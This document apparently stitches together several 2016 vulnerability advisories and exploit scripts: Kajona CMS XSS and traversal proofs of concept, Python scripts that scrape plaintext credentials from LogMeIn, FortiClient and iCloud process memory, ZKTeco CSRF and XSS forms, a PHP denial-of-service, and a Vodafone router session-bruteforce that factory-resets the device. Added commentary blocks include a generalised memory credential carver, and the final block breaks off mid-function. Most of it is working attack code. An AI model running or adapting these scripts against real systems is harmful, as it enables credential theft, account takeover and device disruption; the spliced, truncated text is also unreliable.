Fixed Version Link: https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Vendor Website: https://www.kajona.de/
Vulnerability Type: XSS & Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable
to multiple XSS attacks and limited directory traversal.
The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.
The directory traversal issue gives information about which files exist on a
system, and thus allows an attacker to gather information about a system.
3. Details
XSS 1: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The function that parses admin requests echoes user input into a JavaScript
context without escaping, leading to reflected XSS. As the injection takes
place into a JavaScript context, browser filters will generally not be able to
filter out an attack.
In the case of Kajona, XSS may lead to code execution, as admins can upload PHP
files via the media manager.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='
Code:
core/module_system/system/class_request_dispatcher.php
$strReturn = "<html><head></head><body onload=\"parent.location = '" . urldecode(getGet("peRefreshPage")) . "';\"></body></html>";
XSS 2: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The media manager echoes the form_element parameter into a JavaScript context
without escaping, leading to reflected XSS. As the injection takes place into a
JavaScript context, browser filters will generally not be able to filter out an
attack. Note that a valid systemid is required.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#
Click on "Accept" overlay of an image to trigger the injected code.
XSS 3: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The "class_messageprovider_exceptions_enabled" parameter of the xml.php script
is vulnerable to reflected XSS.
Proof of Concept:
http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<a xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'><a%3abody onload%3d'alert(1)'%2f><%2fa>&messageprovidertype=class_messageprovider_exceptions
XSS 4: Persistent XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
When creating a comment, the subject is vulnerable to persistent XSS. The click
of an admin is required to execute the injected JavaScript code.
Proof of Concept:
1. Leave a comment:
http://localhost/kajona/index.php?page=postacomment
2. As subject, use:
');alert('1
3. Visit the comment overview:
http://localhost/kajona/index.php?admin=1&module=postacomment&action=list
4. Click edit on the comment
5. Click on "Edit Tags" (the second symbol from the right)
Directory Traversal
When viewing images, the file name is improperly sanitized, allowing for
directory traversal.
It is not possible to actually read out files, as there are additional checks
in place preventing that. But an unauthenticated attacker can still see which
files exist on a system and which do not, making it possible to collect
information for further attacks.
Proof of Concept:
GET /kajona/image.php?image=/files/images/upload/....//....//....//download.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 200 (but not shown)
GET /kajona/image.php?image=/files/images/upload/....//....//....//foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 404
Code:
core/module_system/image.php
public function __construct() {
    //find the params to use
    $this->strFilename = urldecode(getGet("image"));
    //avoid directory traversing
    $this->strFilename = str_replace("../", "", $this->strFilename);
    [...]
}
[...]
private function resizeImage() {
    //Load the image-dimensions
    if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {
        [...]
    }
    class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
    class_response_object::getInstance()->sendHeaders();
}
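An added Python example (not Kajona code) that models the quoted PHP logic to show why a single-pass "../" removal followed by a substring check can be bypassed, beside the containment check a fix needs: canonicalize first, then require the result to stay under the permitted directories. The web root and paths are constructed; posixpath is used so the result is the same on every platform.

```python
# Added example (not Kajona code): the single-pass "../" removal quoted above, the
# substring check that follows it, and a hardened containment check side by side.
import posixpath

ALLOWED_DIRS = ("files", "templates")   # the two directories the quoted check looks for


def strip_once(path: str) -> str:
    """Mirror of str_replace("../", "", $path): one left-to-right pass, never repeated."""
    return path.replace("../", "")


def kajona_style_check(webroot: str, user_path: str) -> str:
    """The quoted logic: strip once, then accept if '/files' or '/templates' occurs
    anywhere in the string. Returns the path that would be handed to is_file(), or ''."""
    stripped = strip_once(user_path)
    if "/files" in stripped or "/templates" in stripped:
        return webroot + stripped
    return ""


def canonical(path: str) -> str:
    """Collapse '.', '..' and duplicate slashes the way the filesystem will."""
    return posixpath.normpath(path)


def resolve_image_path(webroot: str, user_path: str):
    """Hardened form: canonicalize first, then require the result to sit under
    webroot/files or webroot/templates. Returns the canonical path or None."""
    candidate = canonical(posixpath.join(webroot, user_path.lstrip("/")))
    for sub in ALLOWED_DIRS:
        allowed = posixpath.join(webroot, sub)
        if candidate == allowed or candidate.startswith(allowed + "/"):
            return candidate
    return None


WEBROOT = "/var/www/kajona"   # constructed
PROBE = "/files/images/upload/....//....//....//download.php"   # the probe from the PoC

if __name__ == "__main__":
    # After one strip pass each "....//" has become "../"; the substring check still
    # passes, and is_file() is asked about webroot/download.php.
    print(canonical(kajona_style_check(WEBROOT, PROBE)))   # /var/www/kajona/download.php
    print(resolve_image_path(WEBROOT, strip_once(PROBE)))  # None
```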
4. Solution
To mitigate this issue please upgrade at least to version 5.0:
https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Please note that a newer version might already be available.
5. Report Timeline
04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-Traversal-163.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure: the supplied username and password are stored in plaintext in the process memory.
# A potential attacker could reveal the supplied username and password in order to gain access to the account and its associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process   # winappdbg (Python 2) handles the process scan and memory reads

username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()

try:
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process, process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid != 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)
        process = Process(process_pid)
        # The byte string is "&__VIEWSTATE="; each hit marks a form body, of which 150 bytes are read.
        for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
            memory_dump.append(process.read(address, 150))
        # Walk every captured chunk (not the length of the first chunk, as originally written).
        for i in range(len(memory_dump)):
            email_addr = memory_dump[i].split('email=')[1]
            tmp_passwd = memory_dump[i].split('password=')[1]
            username = email_addr.split('&hiddenEmail=')[0]
            password = tmp_passwd.split('&rememberMe=')[0]
            if username != '' and password != '':
                found = 1
                print "[+] Credentials found!\r\n----------------------------------------"
                print "[+] Username: %s" % urllib.unquote_plus(username)
                print "[+] Password: %s" % password
                break
        if found == 0:
            print "[-] Credentials not found! Make sure the client is connected."
    else:
        print "[-] No process found with name '%s'." % (filename)
    debug.loop()
finally:
    debug.stop()
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video: 2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The issue exists due to the way the visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It checks whether the
request is coming from the local machine and sets the ip variable to '127.0.0.1' if it
equals 0:0:0:0:0:0:0:1. The ip variable is then used as the username value with the
password '123456' to authenticate, which discloses sensitive information and/or allows
unauthorized actions.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
18.07.2016
--
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@page import="com.zk.common.util.EnvironmentUtil"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";

String ip= EnvironmentUtil.getClientIp(request);
if("0:0:0:0:0:0:0:1".equals(ip))
{
    ip = "127.0.0.1";
}

%>
<jsp:include page="login.jsp"/>
<script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>

<script>
function autoLogin()
{
    $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
    $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
    var ip = "<%=ip%>";
    $("#userLoginForm input[name='username']").val(ip);
    $("#userLoginForm input[name='password']").val("123456");
    $('#userLoginForm').submit();
}
window.onload=autoLogin;
</script>
---------------------------------------------------------------------------------
<!--
ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video: 2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
<input type="hidden" name="authUser.username" value="thricer" />
<input type="hidden" name="authUser.loginPwd" value="111111" />
<input type="hidden" name="repassword" value="111111" />
<input type="hidden" name="authUser.isActive" value="true" />
<input type="hidden" name="authUser.isSuperuser" value="true" />
<input type="hidden" name="groupIds" value="1" />
<input type="hidden" name="deptIds" value="1" />
<input type="hidden" name="areaIds" value="1" />
<input type="hidden" name="authUser.email" value="lab@zeroscience.mk" />
<input type="hidden" name="authUser.name" value="test" />
<input type="hidden" name="authUser.lastName" value="lasttest" />
<input type="hidden" name="fingerTemplate" value=" " />
<input type="hidden" name="fingerId" value=" " />
<input type="hidden" name="logMethod" value="add" />
<input type="hidden" name="un" value="1471451964349_2769" />
<input type="hidden" name="systemCode" value="base" />
<input type="submit" value="Go" />
</form>
</body>
</html>
ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video: 2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
18.07.2016
--
http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
<!--
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252
Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: CherryPy/3.1.0beta3 WSGI Server
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
Python 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
<input type="hidden" name="pk" value="None" />
<input type="hidden" name="holiday_name" value=""><script>alert(1)</script>" />
<input type="hidden" name="holiday_type" value="1" />
<input type="hidden" name="start_date" value="09/13/2016" />
<input type="hidden" name="end_date" value="10/18/2016" />
<input type="hidden" name="loop_by_year" value="2" />
<input type="hidden" name="memo" value=""><script>alert(2)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
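The form above stores holiday_name and memo with a leading double quote so the payload breaks out of the attribute it is later echoed into. The following is an added example, not code from the advisory or from ZKTeco: a constructed template that mirrors the flaw, the same template with output escaping for the attribute and text contexts, and a blocklist "fix" of the kind that does not hold. The template and its field layout are assumptions, not the product's markup.

```python
import html

# Assumed markup standing in for the holiday edit page; the real template is not on the page.
TEMPLATE = ('<input type="text" name="holiday_name" value="%s">'
            '<textarea name="memo">%s</textarea>')

# The holiday_name payload from the PoC form above.
PAYLOAD_FROM_POC = '"><script>alert(1)</script>'


def render_vulnerable(holiday_name, memo):
    """Echoes the stored values straight into the page, as the affected form does."""
    return TEMPLATE % (holiday_name, memo)


def render_safe(holiday_name, memo):
    """Escape at output time for the context each value lands in. quote=True is the
    part that closes the attribute-injection hole: it turns '"' into &quot;, so the
    value can no longer terminate value="..." and start a new tag."""
    return TEMPLATE % (html.escape(holiday_name, quote=True),
                       html.escape(memo, quote=True))


def naive_filter(value):
    """Input-side blocklist: strips the literal string '<script>' and nothing else.
    A payload that wraps the token around itself survives with the token rebuilt."""
    return value.replace("<script>", "")


def script_tag_survives(rendered):
    """Crude indicator used by the self-test: does a bare <script> tag reach the page?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_FROM_POC, "memo"))
    print(render_safe(PAYLOAD_FROM_POC, "memo"))
    print(naive_filter("<scr<script>ipt>alert(1)</script>"))
```

Escaping belongs at the point of output, chosen by context; the blocklist shows why filtering on the way in is not a substitute.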
<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
    function jsonSerialize() {
        // Every call hands json_encode() a brand-new jsonTmp, so the encoder calls
        // jsonSerialize() on the return value again and never reaches a plain value.
        // The recursion is unbounded and exhausts the stack, crashing the PHP process.
        $jsonTmp = new jsonTmp();
        return $jsonTmp;
    }
}
json_encode(new jsonTmp());
?>
'''
Title : Extracting clear text passwords from running processes(FortiClient)
CVE-ID : none
Product : FortiClient SSLVPN
Service : FortiTray.exe
Affected : <=5.4
Impact : Critical
Remote : No
Website link : http://forticlient.com/
Reported : 31/08/2016
Authors : Viktor Minin https://1-33-7.com
Alexander Korznikov http://korznikov.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
In our research on this program we found that the process stores the credentials you supplied for connecting in clear text in process memory.
In this situation a potential attacker who hacked your system can reveal your username and password, steal them and use them.
This may assist him in gaining persistent access to your organization's LAN.
'''
# Python 2 script; needs winappdbg (1.x) installed on the Windows host.
from winappdbg import Debug, Process

filename = "FortiTray.exe"     # Process name
search_string = "fortissl"     # pattern that sits just before the stored credentials

# Searching function
def memory_search( pid, strings ):
    process = Process( pid )
    mem_dump = []
    ######
    # You could also use process.search_regexp to use regular expressions,
    # or process.search_text for Unicode strings,
    # or process.search_hexa for raw bytes represented in hex.
    ######
    for address in process.search_bytes( strings ):
        dump = process.read(address-10,800)    # read 800 bytes, starting 10 bytes before the hit
        mem_dump.append(dump)
    for i in mem_dump:
        if "FortiClient SSLVPN offline" in i:    # only the block that also carries this string holds the credentials
            # The slices below are the offsets observed for this build, relative to the 800-byte read.
            print "\n"
            print " [+] Address and port to connect: " + str(i[136:180])
            print " [+] UserName: " + str(i[677:685])
            print " [+] Password: " + str(i[705:715])
            print "\n"

debug = Debug()
try:
    # Lookup the currently running processes.
    debug.system.scan_processes()
    # Look for all processes that match the requested filename...
    for ( process, name ) in debug.system.find_processes_by_filename( filename ):
        pid = process.get_pid()
        memory_search(pid,search_string)
finally:
    debug.stop()
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in plaintext in process memory.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to the iCloud account.
#
# Authors are not responsible for any misuse or damage caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
from winappdbg import Debug, Process

def b2h(s):
    # bytes -> "AA BB CC" hex string
    return ''.join(["%02X " % ord(x) for x in s]).strip()

def h2b(s):
    # "AA BB CC" hex string -> bytes
    bytes = []
    s = ''.join(s.split(" "))
    for i in range(0, len(s), 2):
        bytes.append(chr(int(s[i:i+2], 16)))
    return ''.join(bytes)

usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []

debug = Debug()
try:
    print "#########################################################################"
    print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
    print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
    print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
    print "#\t\t\tPlease use responsibly.\t\t\t\t#"
    print "#########################################################################\r\n"
    print "[~] Searching for pid by process name '%s'.." % (filename)
    time.sleep(1)
    debug.system.scan_processes()
    for (process, process_name) in debug.system.find_processes_by_filename(filename):
        process_pid = process.get_pid()
    if process_pid != 0:
        print "[+] Found process with pid #%d" % (process_pid)
        time.sleep(1)
        print "[~] Trying to read memory for pid #%d" % (process_pid)
        process = Process(process_pid)
        # The username follows this byte signature; take the bytes up to the first NUL.
        for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
            memory_dump.append(process.read(address,50))
        try:
            hexstr = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
            usr = h2b(hexstr.split(' 00')[0])
        except:
            pass
        memory_dump = []
        # The password follows a second signature, same NUL-terminated layout.
        for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
            memory_dump.append(process.read(address,60))
        try:
            hexstr = b2h(memory_dump[0]).split('07 00 02 09')[1]
            pwd = h2b(hexstr.split(' 00')[0])
        except:
            pass
        if usr != '' and pwd !='':
            found = 1
            print "[+] iCloud Credentials found!\r\n----------------------------------------"
            print "[+] Username: %s" % usr
            print "[+] Password: %s" % pwd
        if found == 0:
            print "[-] Credentials not found!"
    else:
        print "[-] No process found with name '%s'." % (filename)
    debug.loop()
finally:
    debug.stop()
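Both the FortiClient script and the iCloud script above find credentials the same way: search process memory for a fixed byte marker, read a window around each hit, then slice at hard-coded offsets or split on the first NUL. The offsets break as soon as the build changes. The following is an added example, not part of either advisory, that generalises the search step: it carves every printable ASCII run and every UTF-16LE run within a window after each marker hit, which is what you do against a fresh build before you know the offsets. The memory buffer, the second marker value and the credentials in it are constructed for the self-test; against a live process you would pass the bytes returned by winappdbg's process.read() instead.

```python
import re

# The first marker is the literal the FortiClient script searches for; the second is a
# hypothetical 4-byte tag standing in for the binary signature the iCloud script uses.
MARKER_ASCII = b"fortissl"
MARKER_UTF16 = b"\x07\x00\x0a\x16"

# Constructed stand-in for a process-memory read; the layout and every value are made up.
SAMPLE_DUMP = (
    b"\x00" * 32
    + MARKER_ASCII + b"\x00" * 8
    + b"vpn.example.test:10443\x00" + b"\x00" * 23
    + b"jdoe\x00" + b"Winter2016!\x00" + b"\x00" * 64
    + MARKER_UTF16
    + "alice@example.test".encode("utf-16-le") + b"\x00\x00"
    + "Sup3rSecret".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 16
)


def carve_after_marker(dump, marker, window=512, min_len=4):
    """For each occurrence of `marker` in `dump`, collect the printable runs that
    follow it within `window` bytes: ASCII runs and UTF-16LE runs (one NUL after
    each character). Returns one dict per hit with the marker offset and both lists."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    hits = []
    for m in re.finditer(re.escape(marker), dump):
        region = dump[m.end():m.end() + window]
        hits.append({
            "offset": m.start(),
            "ascii": [s.decode("ascii") for s in ascii_re.findall(region)],
            "utf16": [s.decode("utf-16-le") for s in utf16_re.findall(region)],
        })
    return hits


def first_strings(dump, marker, encoding, count):
    """The first `count` strings of one encoding ("ascii" or "utf16") after the
    first marker hit; [] when the marker is absent. With the sample layout the
    ASCII run after MARKER_ASCII is [host:port, username, password]."""
    hits = carve_after_marker(dump, marker)
    if not hits:
        return []
    return hits[0][encoding][:count]


if __name__ == "__main__":
    for hit in carve_after_marker(SAMPLE_DUMP, MARKER_ASCII):
        print("marker at +%d: ascii=%r utf16=%r" % (hit["offset"], hit["ascii"], hit["utf16"]))
    print(first_strings(SAMPLE_DUMP, MARKER_UTF16, "utf16", 2))
```

Once the carved strings show which order the fields appear in, the fixed-offset version is a one-line optimisation; until then the carver is the safer tool, and it also makes clear that the process is holding the secret in the first place.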
import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue

print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""

thread_lock = False
session = ""

def unix_time_millis(dt):
    # Despite the name this returns whole seconds since the epoch, which is
    # the granularity the router's session token is built from.
    epoch = datetime.utcfromtimestamp(0)
    return int(((dt - epoch).total_seconds() * 1000.0) / 1000)

def crack(queue):
    # Worker: pull candidate "stok" cookies off the queue and ask the router for
    # AuthMode; a non-empty answer means the cookie is a live admin session.
    global thread_lock
    global session
    while True:
        if thread_lock:
            return
        if not queue.empty():
            cookie = queue.get()
            headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
            req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
                                  % time.time(), None, headers)
            result = urllib2.urlopen(req).read()
            if json.loads(result)["AuthMode"] != "":
                print "[+] Found valid admin session!"
                print "[INFO] Terminating other threads ... please wait"
                session = cookie
                queue.task_done()
                thread_lock = True

def start_threads_with_args(target, n, arg):
    thread_pool = []
    for n_threads in range(0, n):
        thread = Thread(target=target, args=(arg,))
        thread_pool.append(thread)
        thread_pool[-1].start()
    return thread_pool

def start_bruteforce():
    global session
    global thread_lock
    queue = Queue(0)
    start_threads_with_args(crack, 15, queue)
    # The token is the fixed prefix 123abc456def789 followed either by a
    # three-digit counter or by the Unix time (seconds) of the admin's login.
    print "[!] Trying fast bruteforce..."
    for x in range(0, 1000):
        if thread_lock:
            break
        queue.put("123abc456def789%03d" % x)
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    print "[!] Trying slow bruteforce..."
    for milliseconds in range(0, how_many):
        if thread_lock:
            break
        queue.put("123abc456def789%s" % (start + milliseconds))
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    return session

if __name__ == "__main__":
    now = datetime.now()
    hours = raw_input("How many hours ago admin logged in: ")
    minutes = raw_input("How many minutes ago admin logged in: ")
    # Candidate window: from the estimated login time up to the end of today.
    init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
    end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
    start = unix_time_millis(init)
    how_many = unix_time_millis(end) - start + 1
    print "[+] Starting session bruteforce with 15 threads"
    valid_session = ""
    try:
        valid_session = start_bruteforce()
    except KeyboardInterrupt:
        print "[-] Exiting.."
        thread_lock = True
        exit(0)
    if valid_session == "":
        print "[!] Can't find valid session :( quitting..."
        exit(0)
    # A factory reset is what puts the password back to 'admin'.
    print "[+] Resetting router password to 'admin' , network may be down for a while"
    headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
    req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
                          "goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
    try:
        urllib2.urlopen(req).read()
    except httplib.BadStatusLine:
        # The router reboots mid-response, so a broken status line is the success case.
        print "[!] Password resetted to admin! have fun!"
        exit(0)
    except Exception:
        print "[x] Error during password reset"
        print "[-] Can't reset password try manually, your session is: %s" % valid_session
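The exploit above works because the router's stok cookie is a constant prefix plus either a three-digit counter or the login time in seconds, so a two-hour uncertainty about when the admin logged in leaves a few thousand candidates. The following is an added example, not part of the exploit above or of Vodafone's firmware, that reproduces the candidate enumeration offline against a constructed stand-in for the AuthMode check, reports the size of the search space, and shows the token an unpredictable session should have used. The PREFIX constant is the one the exploit uses; the mock router and the login times are made up for the self-test.

```python
import math
import secrets
from datetime import datetime, timedelta, timezone

PREFIX = "123abc456def789"   # fixed part of the router's "stok" cookie, as used by the exploit above


def candidate_tokens(earliest, latest):
    """Enumerate the cookies the exploit tries: the 000-999 counter form first,
    then the prefix followed by every Unix-second timestamp in [earliest, latest]."""
    for x in range(1000):
        yield "%s%03d" % (PREFIX, x)
    for t in range(int(earliest.timestamp()), int(latest.timestamp()) + 1):
        yield "%s%d" % (PREFIX, t)


def keyspace_size(earliest, latest):
    """Number of candidates the enumeration produces for the given window."""
    return 1000 + int(latest.timestamp()) - int(earliest.timestamp()) + 1


def keyspace_bits(earliest, latest):
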